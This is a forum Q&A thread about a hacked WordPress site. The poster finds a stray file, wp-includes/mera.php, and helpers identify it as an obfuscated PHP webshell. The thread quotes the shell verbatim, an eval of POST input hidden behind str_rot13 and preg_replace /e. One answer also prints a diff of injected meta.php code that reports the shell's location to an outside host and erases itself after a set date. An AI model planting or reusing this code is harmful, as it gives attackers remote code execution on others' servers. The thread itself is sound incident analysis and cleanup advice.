# WordPress Site hacked? Suspicious PHP file

Tags: php, wordpress, security

I found a suspicious PHP file /wp-includes/mera.php

Content:

```
<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['vfj39']) && ($www= $_POST['vfj39']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>
```

Could `@preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');` possibly do something malicious?

Comment: `str_rot13('riny')` returns `eval`...

Comment: I am not sure about what the code does, but the file does not appear in any wordpress documentation, so unless one of your installed applications use it it may be malicious.

Comment: That code looks like it'll run arbitrary code.  Delete it, then take a look at [this codex page](https://codex.wordpress.org/FAQ_My_site_was_hacked).

Comment: Thank you guys! I removed the files and fixed the meta.php (see my answer below).  Why the 3 downvotes tho?

Answer (score 2, accepted):

***Delete the file instantly!***

This `PHP` code is a modified [webshell](https://github.com/JohnTroony/php-webshells). Those could be used to atack other websites and could lead to serious legal problems!

After deletion you *should* also fix the leak that let the file in!

Answer (score 1):

Yes, the PHP script allows to run code on the Server.

Source: http://wordpressvirusremoval.com/blog/execute-a-php-code-through-post-veriable-with-preg_replace-e-modifier/

Through diff'ing with a clean WP tarball, I found meta.php was modified:

```
988,1004d987
<
< check_meta();
< function check_meta(){
<     $jp = __FILE__;
<     $jptime = filemtime($jp);
<
<     if(time() >= 1472456239){
<         $jp_c = file_get_contents($jp);
<         if($t = @strpos($jp_c,"check_meta();")) {
<             $contentp = substr($jp_c,0,$t);
<             if(@file_put_contents($jp, $contentp)){
<                 @touch($jp,$jptime);
<             }
<         }
<     }
<     @file_get_contents("http://web.51.la:82/go.asp?svid=1&id=18944722&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/mera.php");
< }
```

FYI, here are the md5sums of infected files:

```
898af479fe6cc3af461c1878763d19f4  ./wp-includes/meta.php
b657d7c9d9be52771750091df0751fda  ./wp-includes/mera.php
```

Answer (score 0):

You should install something like the Wordfence plug in on your website, which will check all of the plug in and theme folders continuously against  the official release versions. It will also help prevent dangerous file uploads like this.